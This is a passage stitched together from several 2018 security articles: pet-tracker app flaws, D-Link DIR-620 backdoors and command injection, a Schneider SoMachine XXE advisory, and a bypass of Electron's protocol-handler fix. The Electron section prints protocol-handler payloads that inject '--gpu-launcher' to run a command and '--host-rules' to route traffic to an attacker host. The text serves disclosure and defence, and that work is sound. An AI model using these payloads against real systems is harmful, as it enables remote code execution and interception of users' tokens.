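    new_dat, patched = patch_and_refresh(FIRMWARE, OLD_HOST, NEW_HOST)
    print("CRC accepts patched image:", crc_verify(new_dat, patched))
    key = b"device-provisioning-secret"  # assumed per-device secret
    print("MAC accepts patched image:", mac_verify(make_signed_dat(FIRMWARE, key), patched, key))
```

A symmetric MAC is the minimum that closes this bypass; a firmware signature verified with a public key baked into the bootloader is the usual production choice, since it does not require the device to hold a secret that an attacker with the unencrypted image could extract.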

As in the case of Link AKC, the Nuzzle app for Android does not check the server certificate, and the authentication token and user email address are stored in the app folder in unencrypted form.


Unencrypted authorization token and user email address

Registered CVE:
CVE-2018-7043
CVE-2018-7042
CVE-2018-7045
CVE-2018-7044

TrackR
Two TrackR devices featured in our study: Bravo and Pixel. These “trinkets” differ from the previous devices in that their tracking range (if indeed they are intended to track pets) is limited to 100 meters: unlike the other models, they have no GPS module or SIM card, and the only link to them is via Bluetooth LE. Their main purpose is to locate keys, remote controls, etc. around the apartment. However, the developers have equipped the devices with an option that lets them partially track the movements of an object: the tracker’s location can be relayed “via” the smartphones of other TrackR app users. If the app is running on a smartphone, it transfers data to the service about all “trinkets” detected nearby, together with the smartphone’s coordinates. Therein lies the first defect: anyone can sign into the mobile app and send fake coordinates.

We managed to identify a few more problems, but as it turned out, most of them had already been discovered by our colleagues at Rapid7. Although their research was published more than a year ago, some vulnerabilities had yet to be fixed at the time of penning this article.

For instance, the devices have no authentication when connecting via Bluetooth LE, which means they are open to intruders. An attacker could easily connect and turn on the audio signal, for example, simply by changing the value of one characteristic. This could let an attacker find the animal before its owner does, or run down the tracker battery.

Structure of TrackR services and attributes

Besides, the app for Android does not verify server certificates, meaning that an MITM attack could lead to the interception of the password, authentication token, user email address, and device coordinates.

TrackR Android app requests contain an authentication token

On the bright side, the app does not store the authentication token or password in its own folder, which is the proper way to guard against Trojans that use superuser rights to steal data.

Registered CVE:
CVE-2018-7040
CVE-2016-6541

Tractive
Unlike most devices we studied, this tracker does not communicate directly with the smartphone—only through its own servers. This approach is secure enough, but we detected some minor issues in the Android app. First, as in other cases, it does not verify the server certificate, which facilitates MITM attacks. What’s more, the app stores the authentication token in unencrypted form:


As well as pet movement data:


It should be noted that this data is not so easy to steal, since other apps cannot read it. But there are Trojans that can steal data from other apps by exploiting superuser rights.

Weenect WE301
This is another tracker that doesn’t interface with the owner’s smartphone directly, but transfers pet coordinates to the server via a built-in SIM card. We didn’t encounter any security issues with this tracker, but problems similar to those in Tractive were detected in the Android version of the app.

First, it does not prevent MITM attacks, allowing attackers to access the user’s account or intercept geoinformation. Second, authentication data is stored in the app folder in unencrypted form, exposing it to Trojans with superuser rights on the device.

Whistle 3
This is one of the most technically interesting trackers in the study. It can transfer GPS coordinates via its built-in SIM card, via Wi-Fi to its server (if the owner provides a Wi-Fi network password), or directly to the owner’s smartphone via BLE.

We looked at Wi-Fi first of all and found that the developers had taken care to secure the connection: The device transmits small portions of data over HTTPS (that is, in encrypted form).

Wi-Fi data transfer is secured using HTTPS

Next, we checked the BLE connection and found many security issues. The first is the lack of proper authentication. After connecting, the device waits for a certain sequence of actions to be performed, which could be described as pre-authentication. The sequence is so simple that a third party can easily reproduce it. All it takes is to connect to the device, switch two characteristics to WRITE_TYPE_NO_RESPONSE mode, request a change in the size of transmitted data (MTU), turn on notifications for one characteristic, and write a certain number to another characteristic.

Now the tracker is ready to receive and execute commands that do not contain a user ID, which means that anyone can send them. For example, it is possible to send an initiateSession command, and in response the device will send an unencrypted set of data, including the device coordinates. What’s more, if this command is continuously transmitted, the gadget will not send location data via the SIM card, since it will assume that such data has already been received “directly.” Thus, it is possible to “hide” the tracker from its owner.

There is one more problem: the tracker transmits data to the server without any authentication. This means that anyone can impersonate the tracker and submit altered coordinates.

The app transmits data received from the tracker via BLE

The Android app uses the HTTPS protocol (which is good), but does not verify the server certificate.

MITM attacks can intercept user data

Not only that, the smartphone app stores user data in unencrypted form in its own folder, exposing it to theft by a Trojan with superuser rights. However, authentication data is stored correctly.

Tracker coordinates from the app database

Note that the Android app writes data to logcat. As mentioned above, even though an app’s logs can be read only by some system utilities or by apps with superuser rights, there is no need to write important data to the log.

The Android app can log user and pet data (activity, email address, name, owner’s phone number), as well as one of the used tokens

Registered CVE:
CVE-2018-8760
CVE-2018-8757
CVE-2018-8759
CVE-2018-9917

Conclusions
GPS trackers have long been applied successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application. For this, they need to be upgraded with new “user communication interfaces” and “trained” to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, endangering both users and pets.

Research results: four trackers use Bluetooth LE technology to communicate with the owner’s smartphone, but only one does so correctly. The rest can receive and execute commands from anyone. Moreover, they can be disabled or hidden from the owner—all that’s required is proximity to the tracker.

Just one of the tested Android apps verifies the certificate of its server itself, without relying solely on the system. As a result, the rest are vulnerable to MITM attacks—intruders can intercept transmitted data by “persuading” victims to install their certificate.


Backdoors in D-Link’s backyard

26.5.2018 Kaspersky Vulnerebility
Multiple vulnerabilities in D-Link DIR-620 router
“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities
Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, ISP provider, Mitre) and we are publishing this information in accordance with vulnerability disclosure policy.

The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers


The object of research
The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

1.3.1
1.3.3
1.4.0
2.0.22
Technical details
Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)
The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field facilitates an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible as a result of missing filtering of special characters in this field and incorrect processing of the XMLHttpRequest object (this vulnerability was discovered in v.1.3.3, but is also present in other versions).

Demonstration of a reflected XSS

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Hardcoded default credentials for web dashboard (CVE-2018-6213)
I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. This makes it easy to identify the proprietary binary files, i.e., all binaries that are not in the original BusyBox toolset and which were probably modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains hardcoded credentials

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

OS command injection (CVE-2018-6211)
An OS command injection vulnerability is possible as a result of incorrect processing of the user’s input data in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Hardcoded default credentials for Telnet (CVE-2018-6210)
Using the vulnerability above, an attacker can extract Telnet credentials. The credentials were discovered in firmware v1.0.3. For example, by using the default credentials for Telnet an attacker can get administrative access to a router (the fragment of “etc/passwd”).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

How to fix it
We received an official response from the vendor stating that this router model was no longer supported. In this case, we provide the following recommendations:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password
Advisory Status
01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: the model of router was no longer supported by vendor, so vendor will only patch vulnerabilities if the ISP sends a request to do so.


CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
26.5.2018 securityaffairs 
Vulnerebility

Schneider Electric issued a security update for its EcoStruxure Machine Expert (aka SoMachine Basic) product that addresses a high severity vulnerability, tracked CVE-2018-7783, that could be exploited by a remote and unauthenticated attacker to obtain sensitive data.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack.” reads the security advisory published by Schneider Electric.

“The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file”

The EcoStruxure Machine Expert is a tool to program Schneider Modicon M221 programmable logic controller (PLC).

The XML external entity (XXE) vulnerability was discovered by Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk.

According to the expert, the flaw affects SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions. It could be exploited by an attacker to launch an out-of-band (OOB) attack.

In order to exploit the flaw, the attacker has to trick victims into opening a specially crafted SoMachine Basic project or template file.

Krstic also discovered that in certain circumstances the vulnerability can be triggered to achieve arbitrary code execution or to cause a denial-of-service (DoS) condition.

Schneider Electric addressed the vulnerability with the release of SoMachine Basic v1.6 SP1.

SoMachine Basic Schneider Electric

In early May, researchers at Tenable disclosed technical details and PoC code for a critical remote code execution vulnerability affecting Schneider Electric InduSoft Web Studio and InTouch Machine Edition products.

A few days ago, Schneider Electric published a security advisory to warn customers of multiple vulnerabilities in the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager software in PlantStruxure PES.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES.


Flaw in Schneider PLC Programming Tool Allows Remote Attacks
25.5.2018 securityweek 
Vulnerebility

Schneider Electric this week announced that an update for its EcoStruxure Machine Expert product patches a high severity vulnerability that can be exploited remotely to obtain sensitive data.

EcoStruxure Machine Expert - Basic, formerly known as SoMachine Basic, is a lightweight tool designed for programming Schneider’s Modicon M221 programmable logic controller (PLC).

Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk, discovered recently that SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions are impacted by an XML external entity (XXE) vulnerability that can be exploited to launch an out-of-band (OOB) attack.

Tracked as CVE-2018-7783, the vulnerability can be exploited by a remote and unauthenticated attacker to read arbitrary files on the targeted system. These files can include sensitive information, including passwords, user data, and details about the system.

For the attack to work, the hacker needs to convince the targeted user to open a specially crafted SoMachine Basic project or template file.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file,” Krstic wrote in an advisory.

The researcher also pointed out that in certain circumstances the flaw can also be exploited for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric patched the vulnerability with the release of SoMachine Basic v1.6 SP1.

Last month, at SecurityWeek’s ICS Cyber Security Conference in Singapore, Krstic disclosed the details of a DoS vulnerability that affects safety controllers from several major vendors, including devices that are directly exposed to the Internet.

In January, Schneider Electric informed customers that its Floating License Manager, a tool that helps organizations manage licenses for Schneider products, contained code execution, open redirect and DoS vulnerabilities due to the use of a third-party component named Flexera FlexNet Publisher. The security holes were discovered in FlexNet Publisher in 2016 and 2017.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES. ICS-CERT has also published an advisory on Thursday for the Floating License Manager issues.


Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
25.5.2018 securityaffairs
Vulnerebility  

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.
Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006
On January 22, 2018, Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>
Understanding the patch
The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a URL (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}
As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments such as Electron:

The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted
Bypass and security implications
We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent man-in-the-middle attack:

<!doctype html>
<script>
window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>
When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. OAuth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. a nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

Future
On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler
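To make the weaknesses of the blacklist check described above and the dash-dash recommendation concrete, here is an added JavaScript model (not Electron's own code) of the CheckCommandLineArguments loop together with a toy Chromium-style argv parser. The blacklist contents, isUrlArg() and the already-split argv are assumptions for illustration; the real IsUrlArg and kBlacklist live in command_line_args.cc.

```javascript
// Constructed blacklist: a tiny subset of Chromium/Node switches. It must be
// sorted, because isBlacklistedArg() uses binary search, exactly as the
// DCHECK in the real patch requires.
const BLACKLIST = ['gpu-launcher', 'inspect', 'inspect-brk', 'renderer-cmd-prefix'];

// "--name=value" or "--name" -> "name", lower-cased so that the uppercase
// variant (--GPU-launcher) that bypassed the first patch is still matched.
function switchName(arg) {
  if (!arg.startsWith('--') || arg === '--') return null;
  const body = arg.slice(2);
  const eq = body.indexOf('=');
  return (eq === -1 ? body : body.slice(0, eq)).toLowerCase();
}

// Binary search over the blacklist, like std::binary_search in the patch.
// If the list is not sorted, a listed flag can be silently missed.
function isBlacklistedArg(arg, blacklist) {
  const name = switchName(arg);
  if (name === null) return false;
  let lo = 0, hi = blacklist.length - 1;
  while (lo <= hi) {
    const mid = (lo + hi) >> 1;
    if (blacklist[mid] === name) return true;
    if (blacklist[mid] < name) lo = mid + 1; else hi = mid - 1;
  }
  return false;
}

// Assumed simplification of IsUrlArg(): anything that looks like "scheme://".
function isUrlArg(arg) {
  return /^[a-z][a-z0-9+.-]*:\/\//i.test(arg);
}

// Mirrors the loop in the patch: stop at "--"; once a URL argument has been
// seen, reject any following argument that is on the blacklist.
function checkCommandLineArguments(argv, blacklist = BLACKLIST) {
  let blockBlacklisted = false;
  for (const arg of argv) {
    if (arg === '--') break;
    if (blockBlacklisted) {
      if (isBlacklistedArg(arg, blacklist)) return false;
    } else if (isUrlArg(arg)) {
      blockBlacklisted = true;
    }
  }
  return true;
}

// Toy Chromium-style command line: "--x=y" before "--" becomes a switch,
// everything after "--" is a positional argument. This is the property the
// recommended "--" in setAsDefaultProtocolClient / the registry entry relies
// on: an injected --host-rules then lands in args, not in switches.
function parseCommandLine(argv) {
  const switches = {}, args = [];
  let afterDashDash = false;
  for (const arg of argv.slice(1)) {            // argv[0] is the executable
    if (!afterDashDash && arg === '--') { afterDashDash = true; continue; }
    const name = afterDashDash ? null : switchName(arg);
    if (name === null) args.push(arg);
    else switches[name] = arg.includes('=') ? arg.slice(arg.indexOf('=') + 1) : '';
  }
  return { switches, args };
}
```

Run against the page's own payloads, the check blocks --gpu-launcher (in either case) but lets --host-rules through, misses a listed flag when the blacklist is unsorted, and with "--" placed before the URL the injected switch is parsed as a harmless positional argument.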

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.